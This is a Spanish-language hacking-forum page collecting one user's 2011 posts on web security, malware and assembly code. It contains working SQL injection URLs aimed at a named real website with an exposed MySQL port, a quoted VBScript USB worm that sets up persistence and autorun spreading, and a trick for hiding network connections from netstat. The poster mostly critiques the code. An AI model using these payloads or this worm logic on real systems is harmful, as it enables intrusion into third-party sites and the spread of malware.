elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Nivel Web / Re: Clickjacking + Facebook = Likejacking en: 21 Julio 2011, 01:33 am
Shhh que me cambio de nick para que no se den cuenta, me habia olvidado de sacar lo de "Ex xxx-zero-xxx"

Nadie se da cuenta o a nadie le importa, es todo un dilema ;-)
2  Seguridad Informática / Nivel Web / Re: [Video] Guía de Metasploit - Servidor Samba - Acceso Root [Episodio III] en: 19 Julio 2011, 23:54 pm
[offtopic]El siguiente paso en el decaimiento de elhacker.net será el boom de anónimos y tutoriales de Metasploit como si ya no tuviera suficiente documentación o requiera de mucha habilidad usar el famoso framework ;-)[/offtopic]

Excelente aporte :huh:
3  Seguridad Informática / Nivel Web / Re: He encontrado un bug, pero como explotarlo? en: 19 Julio 2011, 10:31 am
Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código.

Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables.

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error -lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- :

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Citar
SELECT command denied to user 'tumusica_new'@'localhost' for table 'user'

O conectarte al puerto de MySQL (el servidor lo tiene abierto) :

Citar
comunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻              207bheDa;D%'

O incluso generar mensajes de error para extraer datos : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1
4  Seguridad Informática / Análisis y Diseño de Malware / Re: [MASM][UserMode]Hook OpenProcess en: 16 Julio 2011, 06:37 am
Es natural que esta clase de códigos se parezcan ya que siempre se usan los mismos métodos basados en la misma teoría. Ahora parece que porque un novato publica su ejemplo de hooking, code caving u otro estúpido nombre que quieran usar es un calca-códigos. Además ni que fueran tan excelentes los ejemplos, se pueden mejorar mucho, simplificar la teoría con un ejemplo práctico, etc. API Hooking en usermode no tiene nada de innovador ni uber para tanta discusión, pienso que cualquier código que use OpenProcess, VirtualProtectEx, VirtualAllocEx, WriteProcessMemory para este tipo de cosas se parecería. Otra cosa que hay que destacar es lo inútiles que son las críticas de los usuarios del foro con su infinita sabiduría.

Código:
mov eax, offset _EndHook
mov ebx, offset _Hook
sub eax, ebx

Esa clase de cosas no requieren hacer uso de instrucciones porque siempre el tamaño entre esos offsets sera un valor fijo ya que no se iran corriendo una vez que se haya ensamblado el código, por lo que se puede usar el tamaño de la función directamente en WriteProcessMemory.

Código:
mov ecx, offset _Hook
invoke WriteProcessMemory,dword ptr[hProcess], dword ptr [fAddress], ecx, dword ptr [DistanceFunc], addr Bytesw

Eso tiene poco sentido y supongo que no hace falta mayor explicacion, sobretodo porque el valor de ecx será diferente despues de la llamada a WriteProcessMemory y porque no se vuelve a usar. Me da pereza seguir revisando el código, nos vemos.
5  Programación / ASM / Re: [MASM] Busca offsets en: 11 Febrero 2011, 18:58 pm
Claro , pero or te modifica eax xD

No si el destino es igual a la fuente. El API GetProcAddress como bien sabemos, si la función falla, devuelve EAX = 0, entonces, en caso de ser 0, el valor no se vería afectado, pero si EAX tiene un valor X y se hace un OR EAX,EAX no estas modificando el valor de EAX. En otras palabras, se puede usar un OR para saber si el valor no es igual a 0 sin que afecte en absoluto.

Por lo tanto,

Código:
Main PROC
    LOCAL resultado:DWORD
 
    invoke LoadLibrary, addr libreria
    invoke GetProcAddress, eax, addr funcion
 
    or eax,eax
    je Error
 
    mov resultado, eax ;Si no quieres usar la variable  imprime directamente eax   
 
   invoke StdOut, uhex$([b]eax[/b])
    ret
Error:
    invoke StdOut, addr error
    ret
Main ENDP

Es correcto, obviando que no lo sería si necesitaramos usar la dirección del API en un código más grande.

Otra alternativa "no-destructiva" a OR es TEST, aunque en este caso no es necesaria, y una "destructiva", además de OR es AND para este caso.

Pasando al tema del código, puedes remover ese stack frame que creas con el macro "PROC", que ni se para que lo usas xD.
6  Foros Generales / Foro Libre / Re: El origen extraterrestre de la especie humana en: 23 Enero 2011, 19:25 pm
Citar
"Los seres humanos parecen ser una raza esclavizada reproduciéndose en un planeta aislado de una pequeña galaxia. La raza humana fue una vez fuente de mano de obra para una civilización extraterrestre, para la cual seguimos siendo su posesión. Para mantener el control sobre su posesión y mantener a la Tierra como una especie de prisión, esa otra civilización ha alimentado un interminable conflicto entre los seres humanos, ha promovido la decadencia espiritual y ha creado en la Tierra condiciones irreversibles de penuria física. Esta situación ha existido por miles de años, y aún continúa hasta nuestros días." (The Gods of Eden).

¿Como con los goa'ulds de "Stargate"?
7  Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!! en: 22 Enero 2011, 21:50 pm
set cmd = createobject("wscript.shell" )
cmd.run "cmd /c  #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c  net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c  reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c  reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c  ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c  attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c  copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c  if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c  attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c  copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c  attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c  copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c  :bucle ", vbHide
cmd.run "cmd /c  call :copiausb ", vbHide
cmd.run "cmd /c  :copiausb ", vbHide
cmd.run "cmd /c  if exist E: call :creausb E ", vbHide
cmd.run "cmd /c  if exist F: call :creausb F ", vbHide
cmd.run "cmd /c  if exist G: call :creausb G ", vbHide
cmd.run "cmd /c  if exist H: call :creausb H ", vbHide
cmd.run "cmd /c  if exist I: call :creausb I ", vbHide
cmd.run "cmd /c  if exist J: call :creausb J ", vbHide
cmd.run "cmd /c  if exist K: call :creausb K ", vbHide
cmd.run "cmd /c  ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c  goto bucle  ", vbHide
cmd.run "cmd /c  goto :eof ", vbHide
cmd.run "cmd /c  :creausb ", vbHide
cmd.run "cmd /c  copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c  attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c  echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c  attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c  goto :eof ", vbHide

Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.

Tampoco el código es una obra maestra...

Citar
cmd.run "cmd /c  #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide

Eso fue muy sin sentido...

Citar
cmd.run "cmd /c  reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c  reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide

En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".

Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.

Citar
Lord RNA podrias enseñarme el code? Es por verlo, si quieres...

Ciertamente no es complicado,

Citar
Yo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real

Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.

Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.
8  Seguridad Informática / Análisis y Diseño de Malware / Re: Ocultar IP a herramientas de Administracion de Redes en: 22 Enero 2011, 01:56 am
Cuando se trata de aplicaciones ejecutadas en línea de comandos, es un desperdicio el reemplazar el ejecutable de netstat, que posiblemente mostraría el típico mensaje de Windows cuando una de sus aplicaciones ha sido reemplazada por "versiones desconocidas". Si bien es cierto que lo óptimo seria el uso de Hooks, existe otra alternativa, aunque sólo aplicable si netstat es ejecutado desde el intérprete de comandos.

La solución consistiría en agregar en "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" un valor alfanumérico llamado "AutoRun" y hacer un doskey de la siguiente forma : [poc]@doskey netstat.exe=filtro[/poc], otra solución, si no se especifica la extensión del ejecutable, sin recurrir a "doskey", es crear un nestat.com en system32, para que cuando se ejecute "netstat", se ejecute nuestro .com.

A todo esto, http://www.osix.net/modules/article/?id=781
9  Foros Generales / Foro Libre / Re: Yo quiero ser Inmortal - NO quiero morir ¿y TU? en: 22 Enero 2011, 01:19 am
Todos somos inmortales.

El tiempo es infinito, pero la materia no. Llegará un momento, en un tiempo X en el que las combinaciones de átomos volverán a repetirse y volveremos a aparecer tal y como estuvimos.

...No recuerdo mis infinitas vidas pasadas, o mis infinitas muertes y resurrecciones. (lol) ¿Quién eres tú?, ¿eres tu consciencia o un cuerpo físico?
10  Comunicaciones / Mensajería / Re: Evitar la actulizacion a MSN 2011 en: 22 Enero 2011, 01:02 am
Hey man yo no lo vi.. ni nada por el estilo simplemente me puse a cranear un cacho nada mas.. y me salio eso simplemente asi de facil y gracias por el dato no sabia q tenia q ser asi 15.4.3508.1109 por algo tardo en conectarme supongo.. Y lo postee es sola para compartir nada mas lo siento si eres tan capo en la materia.. y te moleste

Saludos ]:P

Sí, usted no lo vio publicado en alguna otra comunidad y por ende, el tutorial no se parece en absolutamente nada al resto, pero bueno, no me voy a poner a discutir por eso.
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines